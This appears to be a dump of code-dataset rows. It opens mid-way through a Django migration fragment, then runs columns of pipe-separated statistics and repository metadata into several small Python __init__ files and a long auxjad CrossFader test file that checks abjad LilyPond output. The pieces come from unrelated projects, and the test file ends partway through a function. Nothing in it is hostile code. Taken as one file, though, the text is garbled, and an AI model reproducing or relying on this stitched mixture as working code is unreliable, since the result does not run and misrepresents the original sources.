('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('excluido_por', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical objeto',
},
),
migrations.CreateModel(
name='Nodo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('excluido', models.BooleanField(db_index=True, default=False)),
('excluido_em', models.DateTimeField(blank=True, null=True)),
('quem_sou', models.TextField(blank=True, max_length=500, null=True, verbose_name='Quem Sou?')),
('excluido_por', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='nodo_excluido_por', to=settings.AUTH_USER_MODEL)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Nodos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('excluido', models.BooleanField(db_index=True, default=False)),
('excluido_em', models.DateTimeField(blank=True, null=True)),
('nome', models.CharField(max_length=50, verbose_name='Nome')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
('imagem_listagem', models.ImageField(blank=True, null=True, upload_to='imagens/nodos/listagem')),
('imagem_detalhes', models.ImageField(blank=True, null=True, upload_to='imagens/nodos/detalhes')),
('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
('excluido_por', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='nodos_excluido_por', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Objeto',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('excluido', models.BooleanField(db_index=True, default=False)),
('excluido_em', models.DateTimeField(blank=True, null=True)),
('nome', models.CharField(blank=True, max_length=50, null=True, verbose_name='Nome')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
('imagem_listagem', models.ImageField(blank=True, null=True, upload_to='imagens/objetos/listagem')),
('imagem_detalhes', models.ImageField(blank=True, null=True, upload_to='imagens/objetos/detalhes')),
('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
('excluido_por', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='objeto_excluido_por', to=settings.AUTH_USER_MODEL)),
('nodos', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plataforma.Nodos')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='historicalobjeto',
name='nodos',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='plataforma.Nodos'),
),
]
| 66.836364
| 191
| 0.614708
| 1,171
| 11,028
| 5.601196
| 0.106746
| 0.06998
| 0.04955
| 0.064796
| 0.903491
| 0.903491
| 0.903491
| 0.889312
| 0.877725
| 0.877725
| 0
| 0.007323
| 0.232318
| 11,028
| 164
| 192
| 67.243902
| 0.767423
| 0.006166
| 0
| 0.737179
| 1
| 0
| 0.148672
| 0.008396
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032051
| 0
| 0.057692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d3579f009ee43f63572c2eae938cfe10df670196
| 304
|
py
|
Python
|
telegrambot/handlers/__init__.py
|
matteing/django-telegram-bot
|
917b62846d5c8f26808b1cbb9141b0862303893a
|
[
"BSD-3-Clause"
] | 156
|
2016-01-25T13:46:58.000Z
|
2021-12-17T06:34:14.000Z
|
telegrambot/handlers/__init__.py
|
matteing/django-telegram-bot
|
917b62846d5c8f26808b1cbb9141b0862303893a
|
[
"BSD-3-Clause"
] | 36
|
2016-02-08T09:25:42.000Z
|
2021-03-19T22:04:25.000Z
|
telegrambot/handlers/__init__.py
|
matteing/django-telegram-bot
|
917b62846d5c8f26808b1cbb9141b0862303893a
|
[
"BSD-3-Clause"
] | 70
|
2016-02-07T12:17:23.000Z
|
2022-03-26T08:56:08.000Z
|
from telegrambot.handlers.conf import command # noqa
from telegrambot.handlers.conf import message # noqa
from telegrambot.handlers.conf import regex # noqa
from telegrambot.handlers.conf import unknown_command # noqa
from telegrambot.handlers.resolver import HandlerResolver, HandlerNotFound # noqa
| 60.8
| 82
| 0.832237
| 37
| 304
| 6.810811
| 0.351351
| 0.297619
| 0.456349
| 0.428571
| 0.734127
| 0.440476
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115132
| 304
| 5
| 82
| 60.8
| 0.936803
| 0.078947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d3816a14e6aa8ca6b8b45bbd0cb2326c018d2317
| 47
|
py
|
Python
|
wa_cli/commands/helpers/__init__.py
|
xverges/wa-cli
|
4ad028f9bfd0d7656142bedffc110cccb40399d2
|
[
"Apache-2.0"
] | null | null | null |
wa_cli/commands/helpers/__init__.py
|
xverges/wa-cli
|
4ad028f9bfd0d7656142bedffc110cccb40399d2
|
[
"Apache-2.0"
] | 10
|
2020-03-30T08:09:27.000Z
|
2021-02-03T19:51:16.000Z
|
wa_cli/commands/helpers/__init__.py
|
xverges/wa-cli
|
4ad028f9bfd0d7656142bedffc110cccb40399d2
|
[
"Apache-2.0"
] | 4
|
2020-05-07T15:08:45.000Z
|
2021-01-29T16:32:54.000Z
|
from .protect_readonly import protect_readonly
| 23.5
| 46
| 0.893617
| 6
| 47
| 6.666667
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6cc5cdd6bd391b71f8dddfdbed059d8c7339c9ca
| 159
|
py
|
Python
|
speech2speech/data_preprocessing/__init__.py
|
bithikajain/speech2speech
|
3357a25da837d8d34b3f97c7a9dddae7d27862e0
|
[
"MIT"
] | 1
|
2020-10-24T13:07:37.000Z
|
2020-10-24T13:07:37.000Z
|
speech2speech/data_preprocessing/__init__.py
|
bithikajain/speech2speech
|
3357a25da837d8d34b3f97c7a9dddae7d27862e0
|
[
"MIT"
] | 1
|
2020-10-24T17:12:24.000Z
|
2020-10-24T17:12:24.000Z
|
speech2speech/data_preprocessing/__init__.py
|
bithikajain/speech2speech
|
3357a25da837d8d34b3f97c7a9dddae7d27862e0
|
[
"MIT"
] | 1
|
2021-02-15T04:50:32.000Z
|
2021-02-15T04:50:32.000Z
|
#
# Copyright (C) 2020 Bithika Jain
#
from speech2speech.data_preprocessing.load_data import *
from speech2speech.data_preprocessing.make_spectrograms import *
| 31.8
| 64
| 0.836478
| 19
| 159
| 6.789474
| 0.684211
| 0.263566
| 0.325581
| 0.527132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0.09434
| 159
| 5
| 64
| 31.8
| 0.854167
| 0.194969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9f58b4464d42f9b79084d0d81294219a7e0c652b
| 35,170
|
py
|
Python
|
tests/core/test_CrossFader.py
|
gilbertohasnofb/auxjad
|
553b7fe97221b6f378a93ade6262f024e3cbc678
|
[
"MIT"
] | 6
|
2020-05-18T09:28:29.000Z
|
2021-12-22T00:40:54.000Z
|
tests/core/test_CrossFader.py
|
gilbertohasnofb/auxjad
|
553b7fe97221b6f378a93ade6262f024e3cbc678
|
[
"MIT"
] | 1
|
2021-04-21T20:29:38.000Z
|
2021-04-22T19:44:54.000Z
|
tests/core/test_CrossFader.py
|
gilbertohasnofb/auxjad
|
553b7fe97221b6f378a93ade6262f024e3cbc678
|
[
"MIT"
] | 1
|
2021-04-21T18:54:46.000Z
|
2021-04-21T18:54:46.000Z
|
import random
import abjad
import auxjad
def test_CrossFader_01():
random.seed(17737)
fade_out_container = abjad.Staff(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Staff(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert abjad.lilypond(fader) == abjad.String.normalize(
r"""
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\times 4/5
{
\time 4/4
cs''4
d''1
}
}
"""
)
selection_a, selection_b = fader()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\time 4/4
R1
}
>>
"""
)
selection_a, selection_b = fader()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\times 4/5
{
\time 4/4
r4
d''1
}
}
>>
"""
)
selection_a, selection_b = fader.current_window
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\times 4/5
{
\time 4/4
r4
d''1
}
}
>>
"""
)
def test_CrossFader_02():
fade_out_container = abjad.Container(r"c'4 d'4 ~ d'4 r4")
fade_in_container = abjad.Container(r"r2 c''2")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert len(fader) == 3
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert len(fader) == 5
fade_out_container = abjad.Container(r"c'4 d'4 ~ d'4 r4")
fade_in_container = abjad.Container(r"r2 <c'' e'' g''>2")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert len(fader) == 5
def test_CrossFader_03():
random.seed(44811)
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d'1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
staff_a = abjad.Staff()
staff_b = abjad.Staff()
score = abjad.Score([staff_a, staff_b])
for _ in range(3):
selection_a, selection_b = fader()
staff_a.extend(selection_a)
staff_b.extend(selection_b)
fader.reset()
selection_a, selection_b = fader()
staff_a.extend(selection_a)
staff_b.extend(selection_b)
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
\time 4/4
fs'4
g'2
bf'4
\time 4/4
fs'4
r2
bf'4
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\time 4/4
R1
\times 4/5
{
\time 4/4
cs''4
r1
}
\times 4/5
{
\time 4/4
cs''4
r1
}
\time 4/4
R1
}
>>
"""
)
def test_CrossFader_04():
random.seed(44811)
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d'1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
fs'4
g'2
bf'4
fs'4
r2
bf'4
fs'4
r2
bf'4
r2.
bf'4
R1
}
\new Staff
{
\time 4/4
R1
\times 4/5
{
cs''4
r1
}
\times 4/5
{
cs''4
r1
}
\times 4/5
{
cs''4
d'1
}
\times 4/5
{
cs''4
d'1
}
\times 4/5
{
cs''4
d'1
}
}
>>
"""
)
def test_CrossFader_05():
random.seed(10711)
fade_out_container = abjad.Container(r"e'8 fs'4. r2")
fade_in_container = abjad.Container(r"c''2 ~ c''8 d''4.")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'8
fs'4.
r2
e'8
fs'4.
r2
e'8
r2..
}
\new Staff
{
\time 4/4
R1
c''2
~
c''8
r4.
c''2
~
c''8
r4.
}
>>
"""
)
def test_CrossFader_06():
random.seed(10711)
fade_out_container = abjad.Container(r"e'8 fs'4. r2")
fade_in_container = abjad.Container(r"c''2 ~ c''8 d''4.")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
staff_a = abjad.Staff()
staff_b = abjad.Staff()
score = abjad.Score([staff_a, staff_b])
for selection_a, selection_b in fader:
staff_a.extend(selection_a)
staff_b.extend(selection_b)
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'8
fs'4.
r2
\time 4/4
e'8
fs'4.
r2
\time 4/4
e'8
r2..
\time 4/4
e'8
r2..
\time 4/4
R1
}
\new Staff
{
\time 4/4
R1
\time 4/4
c''2
~
c''8
r4.
\time 4/4
c''2
~
c''8
r4.
\time 4/4
c''2
~
c''8
d''4.
\time 4/4
c''2
~
c''8
d''4.
}
>>
"""
)
def test_CrossFader_07():
random.seed(87114)
fade_out_container = abjad.Container(r"e'8 fs'4. r2")
fade_in_container = abjad.Container(r"c''2 ~ c''8 d''4.")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
staff_a = abjad.Staff()
staff_b = abjad.Staff()
score = abjad.Score([staff_a, staff_b])
for _ in range(3):
selection_a, selection_b = next(fader)
staff_a.extend(selection_a)
staff_b.extend(selection_b)
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'8
fs'4.
r2
\time 4/4
e'8
r2..
\time 4/4
e'8
r2..
}
\new Staff
{
\time 4/4
R1
\time 4/4
R1
\time 4/4
c''2
~
c''8
r4.
}
>>
"""
)
def test_CrossFader_08():
random.seed(62190)
fade_out_container = abjad.Container(r"\time 3/4 r4 c'4 d'4")
fade_in_container = abjad.Container(r"\time 3/4 a''4 g''2")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
r4
c'4
d'4
r2
d'4
r2
d'4
R1 * 3/4
R1 * 3/4
}
\new Staff
{
\time 3/4
R1 * 3/4
R1 * 3/4
a''4
r2
a''4
r2
a''4
g''2
}
>>
"""
)
random.seed(62190)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
r4
c'4
d'4
r2
d'4
r2
d'4
r2
d'4
R1 * 3/4
}
\new Staff
{
\time 3/4
R1 * 3/4
R1 * 3/4
a''4
r2
a''4
g''2
a''4
g''2
}
>>
"""
)
random.seed(62190)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
r4
c'4
d'4
r4
c'4
d'4
r4
c'4
d'4
r2
d'4
R1 * 3/4
}
\new Staff
{
\time 3/4
R1 * 3/4
a''4
r2
a''4
g''2
a''4
g''2
a''4
g''2
}
>>
"""
)
def test_CrossFader_09():
random.seed(50137)
fade_out_container = abjad.Container(r"e'2 c'2")
fade_in_container = abjad.Container(
r"c''8 d''8 e''8 f''8 g''8 a''8 b''8 c'''8"
)
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'2
c'2
e'2
c'2
r2
c'2
r2
c'2
r2
c'2
R1
R1
R1
R1
R1
R1
}
\new Staff
{
\time 4/4
R1
r4.
f''8
r2
r4.
f''8
r2
r4.
f''8
r8
a''8
r4
r4.
f''8
r8
a''8
b''8
r8
r4.
f''8
r8
a''8
b''8
r8
r4.
f''8
r8
a''8
b''8
c'''8
r4
e''8
f''8
r8
a''8
b''8
c'''8
r8
d''8
e''8
f''8
r8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
r8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
g''8
a''8
b''8
c'''8
}
>>
"""
)
random.seed(50137)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
weighted_duration=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'2
c'2
e'2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
R1
}
\new Staff
{
\time 4/4
R1
r4.
f''8
r2
r4.
f''8
r2
r4.
f''8
r8
a''8
r4
r4.
f''8
r8
a''8
b''8
r8
r4
e''8
f''8
r8
a''8
b''8
r8
r4
e''8
f''8
g''8
a''8
b''8
r8
c''8
r8
e''8
f''8
g''8
a''8
b''8
r8
c''8
r8
e''8
f''8
g''8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
g''8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
g''8
a''8
b''8
c'''8
}
>>
"""
)
def test_CrossFader_10():
fade_out_container = abjad.Container(r"\time 3/4 e2 \times 2/3 {fs8 gs4}")
fade_in_container = abjad.Container(r"\time 3/4 c'8 d' e' f' g' a'")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
fader.fade_out_contents = abjad.Container(r"\time 3/4 a4. bf4.")
assert abjad.lilypond(fader) == abjad.String.normalize(
r"""
{
%%% \time 3/4 %%%
a4.
bf4.
}
{
%%% \time 3/4 %%%
c'8
d'8
e'8
f'8
g'8
a'8
}
"""
)
def test_CrossFader_11():
random.seed(41379)
fade_out_container = abjad.Container(r"a'4 bf'2 r4")
fade_in_container = abjad.Container(r"c''2 d''2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
initial_repetitions=2,
final_repetitions=3,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
a'4
bf'2
r4
a'4
bf'2
r4
r4
bf'2
r4
r4
bf'2
r4
r4
bf'2
r4
R1
R1
R1
}
\new Staff
{
\time 4/4
R1
R1
R1
r2
d''2
c''2
d''2
c''2
d''2
c''2
d''2
c''2
d''2
}
>>
"""
)
def test_CrossFader_12():
random.seed(91766)
fade_out_container = abjad.Container(r"a'4 bf'2 r4")
fade_in_container = abjad.Container(r"c''2 d''2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
repetition_chance=0.8,
)
selection_a, selection_b = fader.output_n(4)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
a'4
bf'2
r4
a'4
bf'2
r4
a'4
bf'2
r4
a'4
bf'2
r4
}
\new Staff
{
\time 4/4
R1
r2
d''2
r2
d''2
r2
d''2
}
>>
"""
)
def test_CrossFader_13():
random.seed(81943)
fade_out_container = abjad.Container(
r"\time 3/4 a'4 bf'2 ~ \time 2/4 bf'4 f'4"
)
fade_in_container = abjad.Container(
r"\time 3/4 r16 cs''4.. e''4 \time 2/4 d''2"
)
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
a'4
bf'2
~
\time 2/4
bf'4
f'4
\time 3/4
a'4
bf'2
~
\time 2/4
bf'4
f'4
\time 3/4
a'4
bf'2
~
\time 2/4
bf'4
r4
}
\new Staff
{
\time 3/4
R1 * 3/4
\time 2/4
R1 * 1/2
\time 3/4
r16
cs''4..
r4
\time 2/4
R1 * 1/2
\time 3/4
r16
cs''4..
r4
\time 2/4
R1 * 1/2
}
>>
"""
)
def test_CrossFader_14():
random.seed(75991)
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
omit_time_signatures=True,
)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
fs'4
g'2
bf'4
fs'4
g'2
r4
fs'4
g'2
r4
}
\new Staff
{
R1
R1
\times 4/5
{
cs''4
r1
}
}
>>
"""
)
def test_CrossFader_15():
random.seed(33163)
fade_out_container = abjad.Container(r"c'8 d'4 e'8 ~ e'2")
fade_in_container = abjad.Container(r"c'2 d'2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
disable_rewrite_meter=True,
)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
c'8
d'4
e'8
~
e'2
r8
d'4
e'8
~
e'2
r8
d'4
e'8
~
e'2
}
\new Staff
{
\time 4/4
R1
R1
r2
d'2
}
>>
"""
)
def test_CrossFader_16():
random.seed(81662)
fade_out_container = abjad.Container(r"\time 3/4 c'4 d'4 e'4")
fade_in_container = abjad.Container(r"\time 4/4 g'2 a'2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
weighted_duration=True,
)
selection_a, selection_b = fader.output_all()
staff_a = abjad.Staff(selection_a)
staff_b = abjad.Staff(selection_b)
auxjad.mutate.sync_containers([staff_a, staff_b])
score = abjad.Score([staff_a, staff_b])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
c'4
d'4
e'4
c'4
d'4
e'4
c'4
r4
e'4
c'4
r2
c'4
r2
R1 * 3/4
R1 * 3/4
R1 * 3/4
}
\new Staff
{
\time 4/4
R1
r2
a'2
r2
a'2
r2
a'2
g'2
a'2
g'2
a'2
}
>>
"""
)
def test_CrossFader_17():
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
initial_repetitions=3,
final_repetitions=3,
repetition_chance=0.7,
weighted_duration=True,
disable_rewrite_meter=True,
omit_time_signatures=True,
use_multimeasure_rests=True,
boundary_depth=True,
maximum_dot_count=True,
rewrite_tuplets=True,
)
assert fader.fade_in_first
assert fader.fade_out_last
assert fader.initial_repetitions == 3
assert fader.final_repetitions == 3
assert fader.repetition_chance == 0.7
assert fader.weighted_duration
assert fader.disable_rewrite_meter
assert fader.omit_time_signatures
assert fader.use_multimeasure_rests
assert fader.boundary_depth
assert fader.maximum_dot_count
assert fader.rewrite_tuplets
fader.fade_in_first = False
fader.fade_out_last = False
fader.initial_repetitions = 4
fader.final_repetitions = 7
fader.repetition_chance = 0.23
fader.weighted_duration = False
fader.disable_rewrite_meter = False
fader.omit_time_signatures = False
fader.use_multimeasure_rests = False
fader.boundary_depth = False
fader.maximum_dot_count = False
fader.rewrite_tuplets = False
assert not fader.fade_in_first
assert not fader.fade_out_last
assert fader.initial_repetitions == 4
assert fader.final_repetitions == 7
assert fader.repetition_chance == 0.23
assert not fader.weighted_duration
assert not fader.disable_rewrite_meter
assert not fader.omit_time_signatures
assert not fader.use_multimeasure_rests
assert not fader.boundary_depth
assert not fader.maximum_dot_count
assert not fader.rewrite_tuplets
def test_CrossFader_18():
random.seed(97142)
fade_out_container = abjad.Container(r"c'4.\p e'8--\f ~ e'2")
fade_in_container = abjad.Container(
r"\times 2/3 {f'4-.\pp r4 d'4->\f ~ } d'2"
)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
c'4.
\p
e'8
\f
- \tenuto
~
e'2
c'4.
\p
e'8
\f
- \tenuto
~
e'2
r4.
e'8
- \tenuto
~
e'2
r4.
e'8
- \tenuto
~
e'2
R1
}
\new Staff
{
\time 4/4
R1
\times 2/3
{
f'4
\pp
- \staccato
r2
}
r2
\times 2/3
{
f'4
- \staccato
r2
}
r2
\times 2/3
{
f'4
- \staccato
r4
d'4
\f
- \accent
~
}
d'2
\times 2/3
{
f'4
\pp
- \staccato
r4
d'4
\f
- \accent
~
}
d'2
}
>>
"""
)
def test_CrossFader_19():
random.seed(25519)
fade_out_container = abjad.Container(r"\times 2/3 {<c' e'>2 g'1}")
fade_in_container = abjad.Container(r"<d' ef'>2. <bf a'>4")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\times 2/3
{
\time 4/4
<c' e'>2
g'1
}
\times 2/3
{
<c' e'>2
g'1
}
\times 2/3
{
<c' e'>2
g'1
}
\times 2/3
{
<c' e'>2
g'1
}
\times 2/3
{
c'2
g'1
}
\times 2/3
{
c'2
g'1
}
\times 2/3
{
c'2
r1
}
R1
}
\new Staff
{
\time 4/4
R1
ef'2.
r4
<d' ef'>2.
r4
<d' ef'>2.
bf4
<d' ef'>2.
bf4
<d' ef'>2.
<bf a'>4
<d' ef'>2.
<bf a'>4
<d' ef'>2.
<bf a'>4
}
>>
"""
)
def test_CrossFader_20():
random.seed(87144)
fade_out_container = abjad.Container(r"b'8 c''8 e''2 g''4")
fade_in_container = abjad.Container(r"\times 2/3 {e'2 d'2 c'2}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
literal_voice_one = abjad.LilyPondLiteral(r'\voiceOne')
literal_voice_two = abjad.LilyPondLiteral(r'\voiceTwo')
abjad.attach(literal_voice_one, selection_a[0])
abjad.attach(literal_voice_two, selection_b[0])
staff = abjad.Staff(
[abjad.Voice(selection_a), abjad.Voice(selection_b)],
simultaneous=True,
)
